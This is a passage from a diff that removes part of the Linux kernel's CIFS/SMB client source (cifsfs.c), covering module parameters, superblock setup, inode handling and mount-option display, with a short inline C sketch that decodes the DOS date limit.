+-#endif
+-#include "fs_context.h"
+-#include "cached_dir.h"
+-
+-/*
+- * DOS dates from 1980/1/1 through 2107/12/31
+- * Protocol specifications indicate the range should be to 119, which
+- * limits maximum year to 2099. But this range has not been checked.
+- */
+-#define SMB_DATE_MAX (127<<9 | 12<<5 | 31)
+-#define SMB_DATE_MIN (0<<9 | 1<<5 | 1)
+-#define SMB_TIME_MAX (23<<11 | 59<<5 | 29)
+-
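The DOS date macros above pack year-since-1980, month and day into bits 9-15, 5-8 and 0-4 respectively; a quick decoding sketch for SMB_DATE_MAX (user-space C, not part of the patch):

#include <stdio.h>

int main(void)
{
	unsigned int d = (127 << 9) | (12 << 5) | 31;	/* SMB_DATE_MAX */

	printf("%u/%u/%u\n",
	       1980 + (d >> 9), (d >> 5) & 0xf, d & 0x1f);	/* 2107/12/31 */
	return 0;
}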
+-int cifsFYI = 0;
+-bool traceSMB;
+-bool enable_oplocks = true;
+-bool linuxExtEnabled = true;
+-bool lookupCacheEnabled = true;
+-bool disable_legacy_dialects; /* false by default */
+-bool enable_gcm_256 = true;
+-bool require_gcm_256; /* false by default */
+-bool enable_negotiate_signing; /* false by default */
+-unsigned int global_secflags = CIFSSEC_DEF;
+-/* unsigned int ntlmv2_support = 0; */
+-unsigned int sign_CIFS_PDUs = 1;
+-
+-/*
+- * Global transaction id (XID) information
+- */
+-unsigned int GlobalCurrentXid;	/* protected by GlobalMid_Sem */
+-unsigned int GlobalTotalActiveXid; /* prot by GlobalMid_Sem */
+-unsigned int GlobalMaxActiveXid;	/* prot by GlobalMid_Sem */
+-spinlock_t GlobalMid_Lock; /* protects above & list operations on midQ entries */
+-
+-/*
+- *  Global counters, updated atomically
+- */
+-atomic_t sesInfoAllocCount;
+-atomic_t tconInfoAllocCount;
+-atomic_t tcpSesNextId;
+-atomic_t tcpSesAllocCount;
+-atomic_t tcpSesReconnectCount;
+-atomic_t tconInfoReconnectCount;
+-
+-atomic_t mid_count;
+-atomic_t buf_alloc_count;
+-atomic_t small_buf_alloc_count;
+-#ifdef CONFIG_CIFS_STATS2
+-atomic_t total_buf_alloc_count;
+-atomic_t total_small_buf_alloc_count;
+-#endif/* STATS2 */
+-struct list_head	cifs_tcp_ses_list;
+-spinlock_t		cifs_tcp_ses_lock;
+-static const struct super_operations cifs_super_ops;
+-unsigned int CIFSMaxBufSize = CIFS_MAX_MSGSIZE;
+-module_param(CIFSMaxBufSize, uint, 0444);
+-MODULE_PARM_DESC(CIFSMaxBufSize, "Network buffer size (not including header) "
+-				 "for CIFS requests. "
+-				 "Default: 16384 Range: 8192 to 130048");
+-unsigned int cifs_min_rcv = CIFS_MIN_RCV_POOL;
+-module_param(cifs_min_rcv, uint, 0444);
+-MODULE_PARM_DESC(cifs_min_rcv, "Network buffers in pool. Default: 4 Range: "
+-				"1 to 64");
+-unsigned int cifs_min_small = 30;
+-module_param(cifs_min_small, uint, 0444);
+-MODULE_PARM_DESC(cifs_min_small, "Small network buffers in pool. Default: 30 "
+-				 "Range: 2 to 256");
+-unsigned int cifs_max_pending = CIFS_MAX_REQ;
+-module_param(cifs_max_pending, uint, 0444);
+-MODULE_PARM_DESC(cifs_max_pending, "Simultaneous requests to server for "
+-				   "CIFS/SMB1 dialect (N/A for SMB3) "
+-				   "Default: 32767 Range: 2 to 32767.");
+-#ifdef CONFIG_CIFS_STATS2
+-unsigned int slow_rsp_threshold = 1;
+-module_param(slow_rsp_threshold, uint, 0644);
+-MODULE_PARM_DESC(slow_rsp_threshold, "Amount of time (in seconds) to wait "
+-				   "before logging that a response is delayed. "
+-				   "Default: 1 (if set to 0 disables msg).");
+-#endif /* STATS2 */
+-
+-module_param(enable_oplocks, bool, 0644);
+-MODULE_PARM_DESC(enable_oplocks, "Enable or disable oplocks. Default: y/Y/1");
+-
+-module_param(enable_gcm_256, bool, 0644);
+-MODULE_PARM_DESC(enable_gcm_256, "Enable requesting strongest (256 bit) GCM encryption. Default: n/N/0");
+-
+-module_param(require_gcm_256, bool, 0644);
+-MODULE_PARM_DESC(require_gcm_256, "Require strongest (256 bit) GCM encryption. Default: n/N/0");
+-
+-module_param(enable_negotiate_signing, bool, 0644);
+-MODULE_PARM_DESC(enable_negotiate_signing, "Enable negotiating packet signing algorithm with server. Default: n/N/0");
+-
+-module_param(disable_legacy_dialects, bool, 0644);
+-MODULE_PARM_DESC(disable_legacy_dialects, "To improve security it may be "
+-				  "helpful to restrict the ability to "
+-				  "override the default dialects (SMB2.1, "
+-				  "SMB3 and SMB3.02) on mount with old "
+-				  "dialects (CIFS/SMB1 and SMB2) since "
+-				  "vers=1.0 (CIFS/SMB1) and vers=2.0 are weaker"
+-				  " and less secure. Default: n/N/0");
+-
+-extern mempool_t *cifs_sm_req_poolp;
+-extern mempool_t *cifs_req_poolp;
+-extern mempool_t *cifs_mid_poolp;
+-
+-struct workqueue_struct	*cifsiod_wq;
+-struct workqueue_struct	*decrypt_wq;
+-struct workqueue_struct	*fileinfo_put_wq;
+-struct workqueue_struct	*cifsoplockd_wq;
+-struct workqueue_struct	*deferredclose_wq;
+-__u32 cifs_lock_secret;
+-
+-/*
+- * Bumps refcount for cifs super block.
+- * Note that it should only be called if a reference to the VFS super block is
+- * already held, e.g. in open-type syscalls context. Otherwise it can race with
+- * atomic_dec_and_test in deactivate_locked_super.
+- */
+-void
+-cifs_sb_active(struct super_block *sb)
+-{
+-	struct cifs_sb_info *server = CIFS_SB(sb);
+-
+-	if (atomic_inc_return(&server->active) == 1)
+-		atomic_inc(&sb->s_active);
+-}
+-
+-void
+-cifs_sb_deactive(struct super_block *sb)
+-{
+-	struct cifs_sb_info *server = CIFS_SB(sb);
+-
+-	if (atomic_dec_and_test(&server->active))
+-		deactivate_super(sb);
+-}
+-
+-static int
+-cifs_read_super(struct super_block *sb)
+-{
+-	struct inode *inode;
+-	struct cifs_sb_info *cifs_sb;
+-	struct cifs_tcon *tcon;
+-	struct timespec64 ts;
+-	int rc = 0;
+-
+-	cifs_sb = CIFS_SB(sb);
+-	tcon = cifs_sb_master_tcon(cifs_sb);
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_POSIXACL)
+-		sb->s_flags |= SB_POSIXACL;
+-
+-	if (tcon->snapshot_time)
+-		sb->s_flags |= SB_RDONLY;
+-
+-	if (tcon->ses->capabilities & tcon->ses->server->vals->cap_large_files)
+-		sb->s_maxbytes = MAX_LFS_FILESIZE;
+-	else
+-		sb->s_maxbytes = MAX_NON_LFS;
+-
+-	/*
+-	 * Some very old servers like DOS and OS/2 used 2 second granularity
+-	 * (while all current servers use 100ns granularity - see MS-DTYP)
+-	 * but 1 second is the maximum allowed granularity for the VFS
+-	 * so for old servers set time granularity to 1 second while for
+-	 * everything else (current servers) set it to 100ns.
+-	 */
+-	if ((tcon->ses->server->vals->protocol_id == SMB10_PROT_ID) &&
+-	    ((tcon->ses->capabilities &
+-	      tcon->ses->server->vals->cap_nt_find) == 0) &&
+-	    !tcon->unix_ext) {
+-		sb->s_time_gran = 1000000000; /* 1 second is max allowed gran */
+-		ts = cnvrtDosUnixTm(cpu_to_le16(SMB_DATE_MIN), 0, 0);
+-		sb->s_time_min = ts.tv_sec;
+-		ts = cnvrtDosUnixTm(cpu_to_le16(SMB_DATE_MAX),
+-				    cpu_to_le16(SMB_TIME_MAX), 0);
+-		sb->s_time_max = ts.tv_sec;
+-	} else {
+-		/*
+-		 * Almost every server, including all SMB2+, uses DCE TIME
+-		 * ie 100 nanosecond units, since 1601.  See MS-DTYP and MS-FSCC
+-		 */
+-		sb->s_time_gran = 100;
+-		ts = cifs_NTtimeToUnix(0);
+-		sb->s_time_min = ts.tv_sec;
+-		ts = cifs_NTtimeToUnix(cpu_to_le64(S64_MAX));
+-		sb->s_time_max = ts.tv_sec;
+-	}
+-
+-	sb->s_magic = CIFS_SUPER_MAGIC;
+-	sb->s_op = &cifs_super_ops;
+-	sb->s_xattr = cifs_xattr_handlers;
+-	rc = super_setup_bdi(sb);
+-	if (rc)
+-		goto out_no_root;
+-	/* tune readahead according to rsize if readahead size not set on mount */
+-	if (cifs_sb->ctx->rsize == 0)
+-		cifs_sb->ctx->rsize =
+-			tcon->ses->server->ops->negotiate_rsize(tcon, cifs_sb->ctx);
+-	if (cifs_sb->ctx->rasize)
+-		sb->s_bdi->ra_pages = cifs_sb->ctx->rasize / PAGE_SIZE;
+-	else
+-		sb->s_bdi->ra_pages = cifs_sb->ctx->rsize / PAGE_SIZE;
+-
+-	sb->s_blocksize = CIFS_MAX_MSGSIZE;
+-	sb->s_blocksize_bits = 14;	/* default 2**14 = CIFS_MAX_MSGSIZE */
+-	inode = cifs_root_iget(sb);
+-
+-	if (IS_ERR(inode)) {
+-		rc = PTR_ERR(inode);
+-		goto out_no_root;
+-	}
+-
+-	if (tcon->nocase)
+-		sb->s_d_op = &cifs_ci_dentry_ops;
+-	else
+-		sb->s_d_op = &cifs_dentry_ops;
+-
+-	sb->s_root = d_make_root(inode);
+-	if (!sb->s_root) {
+-		rc = -ENOMEM;
+-		goto out_no_root;
+-	}
+-
+-#ifdef CONFIG_CIFS_NFSD_EXPORT
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) {
+-		cifs_dbg(FYI, "export ops supported\n");
+-		sb->s_export_op = &cifs_export_ops;
+-	}
+-#endif /* CONFIG_CIFS_NFSD_EXPORT */
+-
+-	return 0;
+-
+-out_no_root:
+-	cifs_dbg(VFS, "%s: get root inode failed\n", __func__);
+-	return rc;
+-}
+-
+-static void cifs_kill_sb(struct super_block *sb)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-
+-	/*
+-	 * We need to release all dentries for the cached directories
+-	 * before we kill the sb.
+-	 */
+-	if (cifs_sb->root) {
+-		close_all_cached_dirs(cifs_sb);
+-
+-		/* finally release root dentry */
+-		dput(cifs_sb->root);
+-		cifs_sb->root = NULL;
+-	}
+-
+-	kill_anon_super(sb);
+-	cifs_umount(cifs_sb);
+-}
+-
+-static int
+-cifs_statfs(struct dentry *dentry, struct kstatfs *buf)
+-{
+-	struct super_block *sb = dentry->d_sb;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	unsigned int xid;
+-	int rc = 0;
+-
+-	xid = get_xid();
+-
+-	if (le32_to_cpu(tcon->fsAttrInfo.MaxPathNameComponentLength) > 0)
+-		buf->f_namelen =
+-		       le32_to_cpu(tcon->fsAttrInfo.MaxPathNameComponentLength);
+-	else
+-		buf->f_namelen = PATH_MAX;
+-
+-	buf->f_fsid.val[0] = tcon->vol_serial_number;
+-	/* we are using part of the create time for more randomness; see man statfs */
+-	buf->f_fsid.val[1] =  (int)le64_to_cpu(tcon->vol_create_time);
+-
+-	buf->f_files = 0;	/* undefined */
+-	buf->f_ffree = 0;	/* unlimited */
+-
+-	if (server->ops->queryfs)
+-		rc = server->ops->queryfs(xid, tcon, cifs_sb, buf);
+-
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static long cifs_fallocate(struct file *file, int mode, loff_t off, loff_t len)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(file);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-
+-	if (server->ops->fallocate)
+-		return server->ops->fallocate(file, tcon, mode, off, len);
+-
+-	return -EOPNOTSUPP;
+-}
+-
+-static int cifs_permission(struct user_namespace *mnt_userns,
+-			   struct inode *inode, int mask)
+-{
+-	struct cifs_sb_info *cifs_sb;
+-
+-	cifs_sb = CIFS_SB(inode->i_sb);
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_PERM) {
+-		if ((mask & MAY_EXEC) && !execute_ok(inode))
+-			return -EACCES;
+-		else
+-			return 0;
+-	} else /* file mode might have been restricted at mount time
+-		on the client (above and beyond ACL on servers) for
+-		servers which do not support setting and viewing mode bits,
+-		so allowing client to check permissions is useful */
+-		return generic_permission(&init_user_ns, inode, mask);
+-}
+-
+-static struct kmem_cache *cifs_inode_cachep;
+-static struct kmem_cache *cifs_req_cachep;
+-static struct kmem_cache *cifs_mid_cachep;
+-static struct kmem_cache *cifs_sm_req_cachep;
+-mempool_t *cifs_sm_req_poolp;
+-mempool_t *cifs_req_poolp;
+-mempool_t *cifs_mid_poolp;
+-
+-static struct inode *
+-cifs_alloc_inode(struct super_block *sb)
+-{
+-	struct cifsInodeInfo *cifs_inode;
+-	cifs_inode = alloc_inode_sb(sb, cifs_inode_cachep, GFP_KERNEL);
+-	if (!cifs_inode)
+-		return NULL;
+-	cifs_inode->cifsAttrs = 0x20;	/* default */
+-	cifs_inode->time = 0;
+-	/*
+-	 * Until the file is open and we have gotten oplock info back from the
+-	 * server, can not assume caching of file data or metadata.
+-	 */
+-	cifs_set_oplock_level(cifs_inode, 0);
+-	cifs_inode->flags = 0;
+-	spin_lock_init(&cifs_inode->writers_lock);
+-	cifs_inode->writers = 0;
+-	cifs_inode->netfs.inode.i_blkbits = 14;  /* 2**14 = CIFS_MAX_MSGSIZE */
+-	cifs_inode->server_eof = 0;
+-	cifs_inode->uniqueid = 0;
+-	cifs_inode->createtime = 0;
+-	cifs_inode->epoch = 0;
+-	spin_lock_init(&cifs_inode->open_file_lock);
+-	generate_random_uuid(cifs_inode->lease_key);
+-	cifs_inode->symlink_target = NULL;
+-
+-	/*
+-	 * Can not set i_flags here - they get immediately overwritten to zero
+-	 * by the VFS.
+-	 */
+-	/* cifs_inode->netfs.inode.i_flags = S_NOATIME | S_NOCMTIME; */
+-	INIT_LIST_HEAD(&cifs_inode->openFileList);
+-	INIT_LIST_HEAD(&cifs_inode->llist);
+-	INIT_LIST_HEAD(&cifs_inode->deferred_closes);
+-	spin_lock_init(&cifs_inode->deferred_lock);
+-	return &cifs_inode->netfs.inode;
+-}
+-
+-static void
+-cifs_free_inode(struct inode *inode)
+-{
+-	struct cifsInodeInfo *cinode = CIFS_I(inode);
+-
+-	if (S_ISLNK(inode->i_mode))
+-		kfree(cinode->symlink_target);
+-	kmem_cache_free(cifs_inode_cachep, cinode);
+-}
+-
+-static void
+-cifs_evict_inode(struct inode *inode)
+-{
+-	truncate_inode_pages_final(&inode->i_data);
+-	if (inode->i_state & I_PINNING_FSCACHE_WB)
+-		cifs_fscache_unuse_inode_cookie(inode, true);
+-	cifs_fscache_release_inode_cookie(inode);
+-	clear_inode(inode);
+-}
+-
+-static void
+-cifs_show_address(struct seq_file *s, struct TCP_Server_Info *server)
+-{
+-	struct sockaddr_in *sa = (struct sockaddr_in *) &server->dstaddr;
+-	struct sockaddr_in6 *sa6 = (struct sockaddr_in6 *) &server->dstaddr;
+-
+-	seq_puts(s, ",addr=");
+-
+-	switch (server->dstaddr.ss_family) {
+-	case AF_INET:
+-		seq_printf(s, "%pI4", &sa->sin_addr.s_addr);
+-		break;
+-	case AF_INET6:
+-		seq_printf(s, "%pI6", &sa6->sin6_addr.s6_addr);
+-		if (sa6->sin6_scope_id)
+-			seq_printf(s, "%%%u", sa6->sin6_scope_id);
+-		break;
+-	default:
+-		seq_puts(s, "(unknown)");
+-	}
+-	if (server->rdma)
+-		seq_puts(s, ",rdma");
+-}
+-
+-static void
+-cifs_show_security(struct seq_file *s, struct cifs_ses *ses)
+-{
+-	if (ses->sectype == Unspecified) {
+-		if (ses->user_name == NULL)
+-			seq_puts(s, ",sec=none");
+-		return;
+-	}
+-
+-	seq_puts(s, ",sec=");
+-
+-	switch (ses->sectype) {
+-	case NTLMv2:
+-		seq_puts(s, "ntlmv2");
+-		break;
+-	case Kerberos:
+-		seq_puts(s, "krb5");
+-		break;
+-	case RawNTLMSSP:
+-		seq_puts(s, "ntlmssp");
+-		break;
+-	default:
+-		/* shouldn't ever happen */
+-		seq_puts(s, "unknown");
+-		break;
+-	}
+-
+-	if (ses->sign)
+-		seq_puts(s, "i");
+-
+-	if (ses->sectype == Kerberos)
+-		seq_printf(s, ",cruid=%u",
+-			   from_kuid_munged(&init_user_ns, ses->cred_uid));
+-}
+-
+-static void
+-cifs_show_cache_flavor(struct seq_file *s, struct cifs_sb_info *cifs_sb)
+-{
+-	seq_puts(s, ",cache=");
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_STRICT_IO)
+-		seq_puts(s, "strict");
+-	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DIRECT_IO)
+-		seq_puts(s, "none");
+-	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RW_CACHE)
+-		seq_puts(s, "singleclient"); /* assume only one client access */
+-	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RO_CACHE)
+-		seq_puts(s, "ro"); /* read only caching assumed */
+-	else
+-		seq_puts(s, "loose");
+-}
+-
+-/*
+- * cifs_show_devname() is used so we show the mount device name with correct
+- * format (e.g. forward slashes vs. back slashes) in /proc/mounts
+- */
+-static int cifs_show_devname(struct seq_file *m, struct dentry *root)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(root->d_sb);
+-	char *devname = kstrdup(cifs_sb->ctx->source, GFP_KERNEL);
+-
+-	if (devname == NULL)
+-		seq_puts(m, "none");
+-	else {
+-		convert_delimiter(devname, '/');
+-		/* escape all spaces in share names */
+-		seq_escape(m, devname, " \t");
+-		kfree(devname);
+-	}
+-	return 0;
+-}
+-
+-/*
+- * cifs_show_options() is for displaying mount options in /proc/mounts.
+- * Not all settable options are displayed but most of the important
+- * ones are.
+- */
+-static int
+-cifs_show_options(struct seq_file *s, struct dentry *root)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(root->d_sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-	struct sockaddr *srcaddr;
+-	srcaddr = (struct sockaddr *)&tcon->ses->server->srcaddr;
+-
+-	seq_show_option(s, "vers", tcon->ses->server->vals->version_string);
+-	cifs_show_security(s, tcon->ses);
+-	cifs_show_cache_flavor(s, cifs_sb);
+-
+-	if (tcon->no_lease)
+-		seq_puts(s, ",nolease");
+-	if (cifs_sb->ctx->multiuser)
+-		seq_puts(s, ",multiuser");
+-	else if (tcon->ses->user_name)
+-		seq_show_option(s, "username", tcon->ses->user_name);
+-
+-	if (tcon->ses->domainName && tcon->ses->domainName[0] != 0)
+-		seq_show_option(s, "domain", tcon->ses->domainName);
+-
+-	if (srcaddr->sa_family != AF_UNSPEC) {
+-		struct sockaddr_in *saddr4;
+-		struct sockaddr_in6 *saddr6;
+-		saddr4 = (struct sockaddr_in *)srcaddr;
+-		saddr6 = (struct sockaddr_in6 *)srcaddr;
+-		if (srcaddr->sa_family == AF_INET6)
+-			seq_printf(s, ",srcaddr=%pI6c",
+-				   &saddr6->sin6_addr);
+-		else if (srcaddr->sa_family == AF_INET)
+-			seq_printf(s, ",srcaddr=%pI4",
+-				   &saddr4->sin_addr.s_addr);
+-		else
+-			seq_printf(s, ",srcaddr=BAD-AF:%i",
+-				   (int)(srcaddr->sa_family));
+-	}
+-
+-	seq_printf(s, ",uid=%u",
+-		   from_kuid_munged(&init_user_ns, cifs_sb->ctx->linux_uid));
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_UID)
+-		seq_puts(s, ",forceuid");
+-	else
+-		seq_puts(s, ",noforceuid");
+-
+-	seq_printf(s, ",gid=%u",
+-		   from_kgid_munged(&init_user_ns, cifs_sb->ctx->linux_gid));
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_OVERR_GID)
+-		seq_puts(s, ",forcegid");
+-	else
+-		seq_puts(s, ",noforcegid");
+-
+-	cifs_show_address(s, tcon->ses->server);
+-
+-	if (!tcon->unix_ext)
+-		seq_printf(s, ",file_mode=0%ho,dir_mode=0%ho",
+-					   cifs_sb->ctx->file_mode,
+-					   cifs_sb->ctx->dir_mode);
+-	if (cifs_sb->ctx->iocharset)
+-		seq_printf(s, ",iocharset=%s", cifs_sb->ctx->iocharset);
+-	if (tcon->seal)
+-		seq_puts(s, ",seal");
+-	else if (tcon->ses->server->ignore_signature)
+-		seq_puts(s, ",signloosely");
+-	if (tcon->nocase)
+-		seq_puts(s, ",nocase");
+-	if (tcon->nodelete)
+-		seq_puts(s, ",nodelete");
+-	if (cifs_sb->ctx->no_sparse)
+-		seq_puts(s, ",nosparse");
+-	if (tcon->local_lease)
+-		seq_puts(s, ",locallease");
+-	if (tcon->retry)
+-		seq_puts(s, ",hard");
+-	else
+-		seq_puts(s, ",soft");
+-	if (tcon->use_persistent)
+-		seq_puts(s, ",persistenthandles");
+-	else if (tcon->use_resilient)
+-		seq_puts(s, ",resilienthandles");
+-	if (tcon->posix_extensions)
+-		seq_puts(s, ",posix");
+-	else if (tcon->unix_ext)
+-		seq_puts(s, ",unix");
+-	else
+-		seq_puts(s, ",nounix");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS)
+-		seq_puts(s, ",nodfs");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_POSIX_PATHS)
+-		seq_puts(s, ",posixpaths");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID)
+-		seq_puts(s, ",setuids");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UID_FROM_ACL)
+-		seq_puts(s, ",idsfromsid");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)
+-		seq_puts(s, ",serverino");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
+-		seq_puts(s, ",rwpidforward");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL)
+-		seq_puts(s, ",forcemand");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_XATTR)
+-		seq_puts(s, ",nouser_xattr");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SPECIAL_CHR)
+-		seq_puts(s, ",mapchars");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SFM_CHR)
+-		seq_puts(s, ",mapposix");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL)
+-		seq_puts(s, ",sfu");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
+-		seq_puts(s, ",nobrl");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_HANDLE_CACHE)
+-		seq_puts(s, ",nohandlecache");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID)
+-		seq_puts(s, ",modefromsid");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL)
+-		seq_puts(s, ",cifsacl");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM)
+-		seq_puts(s, ",dynperm");
+-	if (root->d_sb->s_flags & SB_POSIXACL)
+-		seq_puts(s, ",acl");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS)
+-		seq_puts(s, ",mfsymlinks");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_FSCACHE)
+-		seq_puts(s, ",fsc");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOSSYNC)
+-		seq_puts(s, ",nostrictsync");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_PERM)
+-		seq_puts(s, ",noperm");
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_BACKUPUID)
+-		seq_printf(s, ",backupuid=%u",
+-			   from_kuid_munged(&init_user_ns,
+-					    cifs_sb->ctx->backupuid));
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_BACKUPGID)
+-		seq_printf(s, ",backupgid=%u",
+-			   from_kgid_munged(&init_user_ns,
+-					    cifs_sb->ctx->backupgid));
+-
+-	seq_printf(s, ",rsize=%u", cifs_sb->ctx->rsize);
+-	seq_printf(s, ",wsize=%u", cifs_sb->ctx->wsize);
+-	seq_printf(s, ",bsize=%u", cifs_sb->ctx->bsize);
+-	if (cifs_sb->ctx->rasize)
+-		seq_printf(s, ",rasize=%u", cifs_sb->ctx->rasize);
+-	if (tcon->ses->server->min_offload)
+-		seq_printf(s, ",esize=%u", tcon->ses->server->min_offload);
+-	seq_printf(s, ",echo_interval=%lu",
+-			tcon->ses->server->echo_interval / HZ);
+-
+-	/* Only display the following if overridden on mount */
+-	if (tcon->ses->server->max_credits != SMB2_MAX_CREDITS_AVAILABLE)
+-		seq_printf(s, ",max_credits=%u", tcon->ses->server->max_credits);
+-	if (tcon->ses->server->tcp_nodelay)
+-		seq_puts(s, ",tcpnodelay");
+-	if (tcon->ses->server->noautotune)
+-		seq_puts(s, ",noautotune");
+-	if (tcon->ses->server->noblocksnd)
+-		seq_puts(s, ",noblocksend");
+-
+-	if (tcon->snapshot_time)
+-		seq_printf(s, ",snapshot=%llu", tcon->snapshot_time);
+-	if (tcon->handle_timeout)
+-		seq_printf(s, ",handletimeout=%u", tcon->handle_timeout);
+-
+-	/*
+-	 * Display file and directory attribute timeout in seconds.
+-	 * If the file and directory attribute timeouts are the same, actimeo
+-	 * was likely specified on mount
+-	 */
+-	if (cifs_sb->ctx->acdirmax == cifs_sb->ctx->acregmax)
+-		seq_printf(s, ",actimeo=%lu", cifs_sb->ctx->acregmax / HZ);
+-	else {
+-		seq_printf(s, ",acdirmax=%lu", cifs_sb->ctx->acdirmax / HZ);
+-		seq_printf(s, ",acregmax=%lu", cifs_sb->ctx->acregmax / HZ);
+-	}
+-	seq_printf(s, ",closetimeo=%lu", cifs_sb->ctx->closetimeo / HZ);
+-
+-	if (tcon->ses->chan_max > 1)
+-		seq_printf(s, ",multichannel,max_channels=%zu",
+-			   tcon->ses->chan_max);
+-
+-	if (tcon->use_witness)
+-		seq_puts(s, ",witness");
+-
+-	return 0;
+-}
+-
+-static void cifs_umount_begin(struct super_block *sb)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct cifs_tcon *tcon;
+-
+-	if (cifs_sb == NULL)
+-		return;
+-
+-	tcon = cifs_sb_master_tcon(cifs_sb);
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	spin_lock(&tcon->tc_lock);
+-	if ((tcon->tc_count > 1) || (tcon->status == TID_EXITING)) {
+-		/* we have other mounts to same share or we have
+-		   already tried to umount this and woken up
+-		   all waiting network requests, nothing to do */
+-		spin_unlock(&tcon->tc_lock);
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		return;
+-	}
+-	/*
+-	 * can not set tcon->status to TID_EXITING yet since we don't know if umount -f will
+-	 * fail later (e.g. due to open files).  TID_EXITING will be set just before tdis req sent
+-	 */
+-	spin_unlock(&tcon->tc_lock);
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	cifs_close_all_deferred_files(tcon);
+-	/* cancel_brl_requests(tcon); */ /* BB mark all brl mids as exiting */
+-	/* cancel_notify_requests(tcon); */
+-	if (tcon->ses && tcon->ses->server) {
+-		cifs_dbg(FYI, "wake up tasks now - umount begin not complete\n");
+-		wake_up_all(&tcon->ses->server->request_q);
+-		wake_up_all(&tcon->ses->server->response_q);
+-		msleep(1); /* yield */
+-		/* we have to kick the requests once more */
+-		wake_up_all(&tcon->ses->server->response_q);
+-		msleep(1);
+-	}
+-
+-	return;
+-}
+-
+-static int cifs_freeze(struct super_block *sb)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct cifs_tcon *tcon;
+-
+-	if (cifs_sb == NULL)
+-		return 0;
+-
+-	tcon = cifs_sb_master_tcon(cifs_sb);
+-
+-	cifs_close_all_deferred_files(tcon);
+-	return 0;
+-}
+-
+-#ifdef CONFIG_CIFS_STATS2
+-static int cifs_show_stats(struct seq_file *s, struct dentry *root)
+-{
+-	/* BB FIXME */
+-	return 0;
+-}
+-#endif
+-
+-static int cifs_write_inode(struct inode *inode, struct writeback_control *wbc)
+-{
+-	fscache_unpin_writeback(wbc, cifs_inode_cookie(inode));
+-	return 0;
+-}
+-
+-static int cifs_drop_inode(struct inode *inode)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-
+-	/* no serverino => unconditional eviction */
+-	return !(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) ||
+-		generic_drop_inode(inode);
+-}
+-
+-static const struct super_operations cifs_super_ops = {
+-	.statfs = cifs_statfs,
+-	.alloc_inode = cifs_alloc_inode,
+-	.write_inode	= cifs_write_inode,
+-	.free_inode = cifs_free_inode,
+-	.drop_inode	= cifs_drop_inode,
+-	.evict_inode	= cifs_evict_inode,
+-/*	.show_path	= cifs_show_path, */ /* Would we ever need show path? */
+-	.show_devname   = cifs_show_devname,
+-/*	.delete_inode	= cifs_delete_inode,  */  /* Do not need above
+-	function unless later we add lazy close of inodes or unless the
+-	kernel forgets to call us with the same number of releases (closes)
+-	as opens */
+-	.show_options = cifs_show_options,
+-	.umount_begin   = cifs_umount_begin,
+-	.freeze_fs      = cifs_freeze,
+-#ifdef CONFIG_CIFS_STATS2
+-	.show_stats = cifs_show_stats,
+-#endif
+-};
+-
+-/*
+- * Get root dentry from superblock according to prefix path mount option.
+- * Return dentry with refcount + 1 on success and NULL otherwise.
+- */
+-static struct dentry *
+-cifs_get_root(struct smb3_fs_context *ctx, struct super_block *sb)
+-{
+-	struct dentry *dentry;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	char *full_path = NULL;
+-	char *s, *p;
+-	char sep;
